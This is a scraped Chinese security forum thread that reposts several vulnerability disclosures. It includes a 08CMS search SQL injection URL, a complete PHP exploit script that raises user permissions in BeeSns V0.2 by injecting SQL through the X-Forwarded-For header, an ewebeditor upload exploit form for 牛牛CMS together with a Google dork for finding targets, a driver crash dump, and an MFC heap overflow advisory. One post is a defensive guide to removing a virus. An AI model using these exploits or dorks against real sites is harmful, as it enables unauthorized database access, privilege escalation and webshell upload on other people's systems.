最近看过此主题的会员

返回列表 发帖

我的第一次

弄个潜水MJJ奖章

 

您可能还想看的主题:

潜水MJJ勋章

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:忧郁小男生发表,本帖发表者忧郁小男生符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者忧郁小男生和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

08CMS小说搜索search.php注入漏洞
//搜索词预处理
$searchword = empty($searchword) ? ” : cutstr(trim($searchword),50,”);
$_da['searchword'] = $searchword;
if($searchword){ www.2cto.com
$filterstr .= ($filterstr ? ‘&’ : ”).’searchword=’.rawurlencode(stripslashes($searchword));
}
//预处理搜索模式:标题subject、关键词keywords、内容fulltxt、会员mname
$searchmode = empty($searchmode) ? ‘subject’ : trim($searchmode);
if(!in_array($searchmode,array(‘subject’,’keywords’,’fulltxt’,’mname’))) $searchmode = ‘subject’;
if(!$chid){
$nochids = empty($nochids) ? ” : trim($nochids);
if($nochids){//排除的模型
$_da['nochids'] = $nochids;
$filterstr .= ($filterstr ? ‘&’ : ”).”nochids=”.$nochids;
$nochids = explode(‘,’,$nochids);
if($nochids) $wherestr .= ” AND a.chid “.multi_str($nochids,1);
}
出现搜索型注入。
http://www.sitedirsec.com/search.php?searchmode=subject&searchword=[%]&caid=0&chid=0&ccid4=0&indays=0&orderby=createdate&searchsubmit=1


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

BeeSns微博V0.2 0day
发布作者:子仪
影响版本:BeeSns V0.2
官方地址: http://www.beesns.com/
漏洞类型:权限提升
漏洞分析:IP过滤不严,导致用户可以提交恶意参数提升自身权限。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧
// 获取客户端IP     function getip() {      if (isset($_SERVER)) {       if (isset($_SERVER[HTTP_X_FORWARDED_FOR])) {        $realip = $_SERVER[HTTP_X_FORWARDED_FOR];       } elseif (isset($_SERVER[HTTP_CLIENT_IP])) {       $realip = $_SERVER[HTTP_CLIENT_IP];       } else {        $realip = $_SERVER[REMOTE_ADDR];       }      } else {       if (getenv("HTTP_X_FORWARDED_FOR")) {       $realip = getenv( "HTTP_X_FORWARDED_FOR");       } elseif (getenv("HTTP_CLIENT_IP")) {        $realip = getenv("HTTP_CLIENT_IP");       } else {        $realip = getenv("REMOTE_ADDR");       }      }     $iphide=explode(".",$realip);            $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生      return $realip;   
EXP:

[quote]
<?php     print_r('     +---------------------------------------------------------------------------+<br>     BeeSns v0.2 Getip() Remote SQL Injection Exploit<br>     site:www.beesns.com  <br>     by 子仪<br>     Blog: http://www.sitedirsec.com  <br>                      +---------------------------------------------------------------------------+<br>');           if (empty($_POST[submit])) {     }else{      error_reporting(7);      ini_set('max_execution_time', 0);     $host = $_POST[host];      $path = $_POST[path];      $username =  $_POST[username];      $password =  $_POST[password];      send();     }      <!--more-->           function send()     {         global $host, $path,$username,$password;                $cmd = "uId=".$username."&amp;uPw=".$password;         $getinj="1.1.1.1',permissions=5 where uid='$username'#";         $data = "POST ".$path."post.php?act=userLogin HTTP/1.1
";         $data .= "Accept: */*
";         $data .= "Accept-Language: zh-cn
";         $data .= "Content-Type: application/x-www-form-urlencoded
";         $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
";         $data .= "Host: $host
";         $data .= "Content-Length: ".strlen($cmd)."
";         $data .= "Connection: Close
";         $data .= "X-Forwarded-For: $getinj

";         $data .= $cmd;              $fp = fsockopen($host, 80);         fputs($fp, $data);               $resp = '';                while ($fp &amp;&amp; !feof($fp))             $resp .= fread($fp, 1024);            if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){       echo "<br><font color='green'>提升权限成功!</font>";      }else{       echo "<font color='red'>Failed!</font>";      }            }     ?>     <form action='' method='POST'>     目标地址:<input type='input' name='host' value='www.sitedirsec.com'>*请勿加<a href="http://


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

sxs.exe病毒专杀工具
前些天电脑中了“sxs.exe病毒”,后来整理了一篇“sxs.exe病毒手动删除方法”,没想到短短几天时间,通过搜索找过来的朋友就突破8000大关,此病毒发作之广可想而知。 杀毒软件方日前终于推出了针对此病毒的专杀工具,再遇到这个问题的朋友就无须自己动手了。 说明: 引用 8月初出现了大量针对主流杀毒软件编写的恶性病毒。它们除了具有常见危害外,还会造成主流杀毒软件和个人防火墙无法打开,甚至导致杀毒时系统出现“蓝屏”、自动重启、死机等状况。 瑞星“橙色八月专用提取清除工具”专门针对此类病毒编写,可清除“QQ通行证(Trojan.PSW.QQPass)”、“传奇终结者(Trojan.PSW.Lmir)”、“密西木马(Trojan.psw.misc)”等病毒及其变种。没有安装瑞星杀毒软件的用户可免费下载使用。 注:建议您重新启动计算机,按住F8键,选择“安全模式”,进入后使用此工具杀毒。 附:病毒列表上的病毒主要针对以下安全软件 卡巴斯基 Symantec AntiVirus 瑞星 江民杀毒软件 天网防火墙个人版 噬菌体 木马克星 金山毒霸 橙色八月专用提取清除工具下载地址: http://it.rising.com.cn/Channels/Service/2006-08/1154786729d36873.shtml   *************************************** sxs.exe病毒手动删除方法  有史以来第一次遭遇如此顽固的病毒,网上找了找,没有统一的名字,瑞星称为 Trojan.PSW.QQPass.pqb 病毒,我就叫它 sxs.exe病毒吧 重装系统后,双击分区盘又中了,郁闷,瑞星自动关闭无法打开,决定手动将其删除 现象:系统文件隐藏无法显示,双击盘符无反映,任务管理器发现 sxs.exe 或者 svohost.exe (与系统进程 svchost.exe 一字之差),杀毒软件实时监控自动关闭并无法打开 找了网上许多方法,无法有效删除,并且没有专杀工具 手动删除“sxs.exe病毒”方法: 在以下整个过程中不得双击分区盘,需要打开时用鼠标右键——打开 一、关闭病毒进程 Ctrl + Alt + Del 任务管理器,在进程中查找 sxs 或 SVOHOST(不是SVCHOST,相差一个字母),有的话就将它结束掉 二、显示出被隐藏的系统文件 运行——regedit HKEY_LOCAL_MACHINE"Software"Microsoft"windows"CurrentVersion" explorer"Advanced"Folder"Hidden"SHOWALL, 将CheckedValue键值修改为1 这里要注意,病毒会把本来有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue,并且把键值改为 0!我们将这个改为1是毫无作用的。(有部分病毒变种会直接把这个CheckedValue给删掉,只需和下面一样,自己再重新建一个就可以了) 方法:删除此CheckedValue键值,单击右键 新建——Dword值——命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。 在文件夹——工具——文件夹选项中将系统文件和隐藏文件设置为显示 三、删除病毒 在分区盘上单击鼠标右键——打开,看到每个盘跟目录下有 autorun.inf 和 sxs.exe 两个文件,将其删除。 四、删除病毒的自动运行项 打开注册表 运行——regedit HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run 下找到 SoundMam 键值,可能有两个,删除其中的键值为 C:WINDOWSsystem32SVOHOST.exe 的 最后到 C:WINDOWSsystem32" 目录下删除 SVOHOST.exe 或 sxs.exe 重启电脑后,发现杀毒软件可以打开,分区盘双击可以打开了。 五、后续 杀毒软件实时监控可以打开,但开机无法自动运行 最简单的办法,执行杀毒软件的添加删除组件——修复,即可。 最近发现中毒的人比较多相关软件下载http://upload.programfan.com/upfile/200611280727787.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

牛牛CMS企业网站管理系统ewebeditor漏洞
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统,公司业务范围涵盖互联网软件系统和互联网安全保障系统开发、企业网站策划、网页设计、虚拟主机、网站维护、域名注册等。其主营产品“牛牛企业网站管理系统”是目前国内中小企业应用最广泛的CMS程序。通过多年的不断创新与完善,使系统集安全、实用、稳定、灵活于一身。牛牛CMS管理系统采用ASP+ACCESS平台开发作为目前最方便快捷使用最多的平台之一低成本预算成为中小企业建站首选.公司拥有一支一流的程序开发团队有着多年中小企业网站建设成功经验官网:http://web.shangpuba.com/后台:admin/login.asp其默认使用网站富媒体编辑器存在上传漏洞



exp:
<form action=http://www.sitedirsec.com/Admin/WebEditor168/asp/upload.asp?action=save&amp;type=image&amp;style=popup&amp;cusdir=Mr.DzY.asp method=post name=myform enctype=multipart/form-data>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>复制代码谷歌关键字:inurl:member/Register.asp 您好,欢迎来到立即注册立即登录


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

注:偶是女滴,千真万确,毋庸置疑!


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

微点2 mp110006.sys驱动0day
DeviceIoControl参数:ioControlCode=8000005EinputAddress=0xD091BB5CinputLen=0x00000000outputAddress=0x022FF4A8outputLen=0xA9E20D28DeviceIoControl结果:失败!DeviceIoControl参数:ioControlCode=8000005EinputAddress=0xD091BB5CinputLen=0x00000000outputAddress=0x022FF4A8outputLen=0x00000020 (没有检查这个长度)*** Fatal System Error: 0x000000d1                       (0xFA0C10100x000000020x000000010xF9B20972)Break instruction exception - code 80000003 (first chance)A fatal system error has occurred.Debugger entered on first try; Bugcheck callbacks have not been invoked.A fatal system error has occurred.TRAP_FRAME:  f7f73aa4 -- (.trap 0xfffffffff7f73aa4)ErrCode = 00000002eax=00000000 ebx=80f73d80 ecx=00000000 edx=00000000 esi=fa0c0fe8 edi=fa0c0feceip=f9b20972 esp=f7f73b18 ebp=f7f73b48 iopl=0         nv up ei pl zr na pe nccs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246mp110006!f1023+0x806:f9b20972 894628          mov     dword ptr [esi+28h]eax ds:0023:fa0c1010=????????                 //输出长度是0x20,但mp110006中没有检查直接写+0x28处的内存,导致内存错误!!!Resetting default scopeLAST_CONTROL_TRANSFER:  from 804f89f7 to 80527fe8STACK_TEXT:  f7f73658 804f89f7 00000003 f7f739b4 00000000 nt!RtlpBreakWithStatusInstructionf7f736a4 804f95e4 00000003 fa0c1010 f9b20972 nt!KiBugCheckDebugBreak+0x19f7f73a84 80540a93 0000000a fa0c1010 00000002 nt!KeBugCheck2+0x574f7f73a84 f9b20972 0000000a fa0c1010 00000002 nt!KiTrap0E+0x233WARNING: Stack unwind information not available. Following frames may be wrong.f7f73b48 f9b1f79c f7f73bac 00000028 00000020 mp110006!f1023+0x806f7f73b64 f9d3ed75 f7f73bac fa0c04a8 80e82230 mp110006!f1015+0x22f7f73bb4 804ef003 815b3830 811b2238 806d12d0 mp110005+0x2d75f7f73bc4 80574e4e 811b22a8 80f8f5a8 811b2238 nt!IopfCallDriver+0x31f7f73bd8 80575cdd 815b3830 811b2238 80f8f5a8 nt!IopSynchronousServiceTail+0x60f7f73c80 8056e63a 00000184 00000000 00000000 nt!Iop**ControlFile+0x5e7f7f73cb4 f746337f 00000184 00000000 00000000 nt!NtDeviceIoControlFile+0x2af7f73d34 8053da48 00000184 00000000 00000000 BehaviorMon!HookNtDeviceIoControlFile+0xccf [e:workiocontrolfuzzerehaviormon_driverssdtssdt.c @ 5112]f7f73d34 7c92eb94 00000184 00000000 00000000 nt!KiFastCallEntry+0xf8022ff410 7c92d8ef 7c801671 00000184 00000000 ntdll!KiFastSystemCallRet022ff414 7c801671 00000184 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc022ff474 0054c4a0 00000184 8000005e d091bb5c kernel32!DeviceIoControl+0xdd022fffb4 7c80b699 00dafe70 77d70088 00000d34 BehaviorMon_400000+0x14c4a0022fffe0 01cbff80 00000000 800005dc 00000000 kernel32!BaseThreadStart+0x37022fffec 00000000 005585e8 00dafe70 00000000 0x1cbff80


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Microsoft MFC库CFileFind::FindFile 堆溢出漏洞
受影响系统:Microsoft Windows XP SP2
描述:
BUGTRAQ  ID: 25697CVE(CAN) ID: CVE-2007-4916
Microsoft Windows是微软发布的非常流行的操作系统。
Windows系统中所提供的MFC42和MFC71库的CFileFind类在处理FindFile()函数参数时存在堆溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限。
MFC[42|71].dll@CFileFind::FindFile(char const *,unsigned long).text:73D6CD3F  mov     edi, edi.text:73D6CD41  push    ebp.text:73D6CD42  push    esi             ; unsigned int.text:73D6CD43  push    edi             ; unsigned __int8 *.text:73D6CD44  mov     esi, ecx.text:73D6CD46  call    CFileFind::Close(void).text:73D6CD4B  push    140h                    ; int   << 320 bytes.text:73D6CD50  call    @operator new(uint)             << buffer Allocate [1].text:73D6CD55  mov     ebp, [esp+14h].text:73D6CD59  and     dword ptr [esi+10h], 0.text:73D6CD5D  test    ebp, ebp.text:73D6CD5F  pop     ecx.text:73D6CD60  mov     [esi+8], eax.text:73D6CD63  jnz     short loc_73D6CD6A.text:73D6CD65  mov     ebp, offset a__1        ; "*.*" << si arg_0 == NULL.text:73D6CD6A loc_73D6CD6A; CODE XREF: CFileFind::FindFile(char const*,ulong)+24j.text:73D6CD6A    push    ebp                           ; lpString2.text:73D6CD6B    add     eax, 2Ch.text:73D6CD6E    push    eax                           ; lpString1.text:73D6CD6F    call    ds:__imp__lstrcpyA@8          ; lstrcpyA(x,x) << [2].text:73D6CD75    push    dword ptr [esi+8]             ; lpFindFileData.text:73D6CD78    push    ebp                           ; lpFileName.text:73D6CD79    call    ds:__imp__FindFirstFileA@8    ; FindFirstFileA(x,x)[...]
MFC[42|71]u.dll@CFileFind::FindFile(char const *,unsigned long).text:5F817BFC  push    ebx                     ; wchar_t.text:5F817BFD  push    esi                     ; wchar_t *.text:5F817BFE  push    edi.text:5F817BFF  mov     esi, ecx.text:5F817C01  call    CFileFind::Close(void).text:5F817C06  push    250h                    ; int   << 592 bytes.text:5F817C0B  call    @operator new(uint)             << buffer allocate [1].text:5F817C10  mov     ebx, [esp+14h].text:5F817C14  and     dword ptr [esi+10h], 0.text:5F817C18  test    ebx, ebx.text:5F817C1A  pop     ecx.text:5F817C1B  mov     [esi+8], eax.text:5F817C1E  jnz     short loc_5F817C25.text:5F817C20  mov     ebx, offset a_          ; "*.*" << si arg_0 == NULL.text:5F817C25 loc_5F817C25; CODE XREF: CFileFind::FindFile(ushort const*,ulong)+22j.text:5F817C25    push    ebx                           ; lpString2.text:5F817C26    add     eax, 2Ch.text:5F817C29    push    eax                           ; lpString1.text:5F817C2A    call    ds:__imp__lstrcpyW@8          ; lstrcpyW(x,x) << [2].text:5F817C30    push    dword ptr [esi+8]             ; lpFindFileData.text:5F817C33    push    ebx                           ; lpFileName.text:5F817C34    call    ds:__imp__FindFirstFileW@8    ;FindFirstFileW(x,x)[...]
FindFile方式为[1]处的缓冲区分配内存,然后未经检查便储存了[2]处函数的第一个参数的内容。如果用户提交了超长参数的话就可以触发堆溢出,导致执行任意指令。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表